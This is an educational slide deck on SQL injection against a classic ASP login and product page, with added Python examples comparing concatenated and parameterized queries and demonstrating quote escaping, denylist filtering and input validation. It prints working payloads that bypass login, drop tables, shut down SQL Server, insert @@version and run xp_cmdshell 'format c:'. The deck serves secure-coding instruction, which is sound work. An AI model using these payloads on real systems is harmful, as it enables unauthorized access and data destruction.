SQL Injection Attacks
Siddhesh Bhobe

SQL Injection Attack… "injects" or manipulates SQL code using "string-building" techniques. By adding unexpected SQL to a query, it is possible to manipulate a database in many unanticipated ways. Attacks succeed because of poor input validation at the code layer.

Example 1: HTML Form
Consider the following HTML form for login:

<form name="frmLogin" action="login.asp" method="post">
  Username: <input type="text" name="userName">
  Password: <input type="text" name="password">
  <input type="submit">
</form>

Example 1: ASP Script

<%
  …
  userName = Request.Form("userName")
  password = Request.Form("password")
  query = "select count(*) from users where userName='" & userName & "' and userPass='" & password & "'"
  …
%>

Sample Input
Login = john, Password = doe
select count(*) from users where userName='john' and userPass='doe'

Now check this!
Login = john, Password = ' or 1=1 --
select count(*) from users where userName='john' and userPass='' or 1=1 --'
The password check is nullified. The -- makes SQL ignore the rest of the line, so the quote the script appends does not make ASP report a mismatched-quote error.

And what about this?
Username: ' or 1=1 --, Password: [Empty]
select count(*) from users where userName='' or 1=1 --' and userPass=''
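To make the string-building flaw concrete, the following added example (not the deck's code) rebuilds the login query in Python against an in-memory SQLite table standing in for the deck's users table, then puts a parameterized version of the same check beside it. The two sample rows are constructed; the table and column names follow the deck.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the deck's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (userName text, userPass text)")
    conn.executemany("insert into users values (?, ?)",
                     [("admin", "s3cret"), ("john", "doe")])
    conn.commit()
    return conn


def build_query_string(user_name, password):
    """Mirror of the deck's ASP string-building: the form fields are pasted
    straight into the SQL text, so their content becomes part of the grammar."""
    return ("select count(*) from users where userName='" + user_name
            + "' and userPass='" + password + "'")


def login_concatenated(conn, user_name, password):
    """Vulnerable check: returns the number of matching rows, which the ASP
    page treats as 'logged in' whenever it is greater than zero."""
    return conn.execute(build_query_string(user_name, password)).fetchone()[0]


def login_parameterized(conn, user_name, password):
    """Hardened check: the SQL text is constant and the values are bound as
    parameters, so a quote or comment marker inside a value is just data."""
    row = conn.execute(
        "select count(*) from users where userName=? and userPass=?",
        (user_name, password),
    ).fetchone()
    return row[0]


if __name__ == "__main__":
    conn = make_db()
    # The deck's three inputs: a normal login and the two injected variants.
    cases = [("john", "doe"), ("john", "' or 1=1 --"), ("' or 1=1 --", "")]
    for user_name, password in cases:
        print(f"{user_name!r:16} {password!r:16} "
              f"concat={login_concatenated(conn, user_name, password)} "
              f"param={login_parameterized(conn, user_name, password)}")
```

The concatenated version reports 2 matches for both injected inputs (every row in the table), which is the nullified password check the deck describes, while the parameterized version reports 0 because it looks for a user whose password is literally `' or 1=1 --`. Python's sqlite3 driver refuses a batch with more than one statement in `execute()`, so the deck's semicolon examples do not reproduce with it; on SQL Server, batches are accepted by default and the same string-building lets the second statement run.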
Example 2
Username: ' having 1=1 --, Password: [Empty]
select userName from users where userName='' having 1=1

You get a column name…
You will get the following error message:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'users.userName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/login.asp, line 16

The Attack…
Username: ' or users.userName like 'a%' --
select userName from users where userName='' or users.userName like 'a%' --' and userPass=''
Logged In As admin!!!
Use of Semi-colon
The semi-colon allows multiple queries to be specified on one line. They are submitted as one batch and executed sequentially:
select 1; select 1+2; select 1+3;

Can you guess what happens?
Username: ' or 1=1; drop table users; --

Table dropped!
Username: ' or 1=1; drop table users; --, Password: [Anything]
Firstly, it would select the userName field for all rows in the users table. Secondly, it would delete the users table.

SHUTDOWN WITH NOWAIT!!
… causes SQL Server to shut down, immediately stopping the Windows service.
Username: '; shutdown with nowait; --
select userName from users where userName=''; shutdown with nowait; --' and userPass=''
Products.asp
http://localhost/products.asp?productId=1 returns: Got product Pink Hoola Hoop
But what about this?
http://localhost/products.asp?productId=0;insert%20into%20products(prodName)%20values(left(@@version,50))

Wham!
Here's the query without the URL-encoded spaces:
http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50))
This runs an INSERT query on the products table, adding the first 50 characters of SQL Server's @@version variable as a new record in the products table.
Effects: Privilege Level sa
Total control of SQL Server
OS shell at the privilege of the MSSQLServer service, using xp_cmdshell
Ability to read, write and mutilate all data

Effects: Privilege Level db_owner
Read/write all data in the affected database
Drop tables
Create new objects
Take control of the database

Effects: Privilege Level normal user (no fixed server or database roles)
Access only to objects to which permission is given
At best, only a few stored procedures
At worst, read/write access to all tables
Recommended!
Testing for Vulnerability
Disable error handling so that errors are displayed
Input single quotes to see if the application fails
Failure indicates poor validation and corruption of the SQL

Preventing SQL Injection Attacks
Limit user access
Escape quotes
Remove culprit characters
Limit the length of user input

Limit User Access
Do not use the "sa" account
Remove extended SPs if you are not using them. A couple of the most damaging ones: xp_cmdshell, xp_grantlogin
Use SPs to abstract data access

Escape Quotes
Escape single quotes by doubling them:

<%
  function stripQuotes(strWords)
    stripQuotes = replace(strWords, "'", "''")
  end function
%>

Converts
select count(*) from users where userName='john' and userPass='' or 1=1 --'
...to this:
select count(*) from users where userName='john'' and userPass=''' or 1=1 --'

Drop Culprit Characters
Drop character sequences like ; , -- , insert and xp_
select prodName from products where id=1; xp_cmdshell 'format c: /q /yes '; drop database myDB; --
becomes
select prodName from products where id=1 cmdshell ''format c: /q /yes '' database myDB

Restrict Length of User Input
Limit length in the form field
Use validating functions for numeric input
Use POST, not GET
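The measures above are worth seeing side by side on the deck's own inputs. The following added example (not the deck's code) ports stripQuotes and the culprit-sequence filter to Python, adds a server-side length check and a validating function for numeric input, and applies them to the login payload and the products.asp payload shown earlier. The limits (32 characters per field, 9 digits for a product id) are assumptions; the deck gives no numbers.

```python
import re

# Assumed limits: the deck says to restrict length but gives no figures.
MAX_FIELD_LEN = 32
MAX_PRODUCT_ID_DIGITS = 9

# The sequences the deck names; anything not on this list passes through.
CULPRIT_SEQUENCES = (";", "--", "insert", "xp_")


def strip_quotes(words):
    """Python equivalent of the deck's VBScript stripQuotes: double each single
    quote so it stays inside the string literal instead of terminating it."""
    return words.replace("'", "''")


def drop_culprit_sequences(words):
    """The deck's 'drop culprit characters' filter. It is a denylist, so it is a
    backstop behind escaping and validation, not a primary control."""
    for seq in CULPRIT_SEQUENCES:
        words = words.replace(seq, "")
    return words


def enforce_length(value, max_len=MAX_FIELD_LEN):
    """Server-side length limit; a maxlength attribute on the form field is not
    enforced, because the client can send any POST body it likes."""
    if len(value) > max_len:
        raise ValueError(f"input exceeds {max_len} characters")
    return value


def parse_product_id(raw):
    """Validating function for numeric input: accept only a plain decimal
    integer, so nothing else can reach the query text."""
    if not re.fullmatch(r"[0-9]{1,%d}" % MAX_PRODUCT_ID_DIGITS, raw):
        raise ValueError("productId must be a positive integer")
    return int(raw)


def is_valid_product_id(raw):
    try:
        parse_product_id(raw)
        return True
    except ValueError:
        return False


def login_query_escaped(user_name, password):
    """The deck's login query with the length check and stripQuotes applied."""
    user_name = strip_quotes(enforce_length(user_name))
    password = strip_quotes(enforce_length(password))
    return ("select count(*) from users where userName='" + user_name
            + "' and userPass='" + password + "'")


def product_query_escaped_only(raw_product_id):
    """Quote escaping applied to the deck's products.asp parameter. The value is
    not quoted in the SQL, so there is no quote to escape and an injected
    statement passes through unchanged."""
    return "select prodName from products where id=" + strip_quotes(raw_product_id)


def product_query_validated(raw_product_id):
    """Numeric validation applied first: non-numeric input never reaches SQL."""
    return "select prodName from products where id=%d" % parse_product_id(raw_product_id)


if __name__ == "__main__":
    print(login_query_escaped("john", "' or 1=1 --"))
    injected_id = "0;insert into products(prodName) values(left(@@version,50))"
    print(product_query_escaped_only(injected_id))
    print("valid product id?", is_valid_product_id(injected_id))
    print(product_query_validated("1"))
```

Quote doubling neutralises the login payloads, and the escaped query it produces is the one the deck shows, but it only protects quoted string literals: the products.asp parameter is numeric and unquoted, so only the validating function stops that input. The denylist filter catches the four sequences it names and nothing else. A parameterized query covers both cases at once; in classic ASP that means an ADODB.Command with Parameters rather than a concatenated string.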
Thanks!
Original Article: http://www.webmasterbase.com/article.php?aid=794&pid=0
Also on Reismagos…
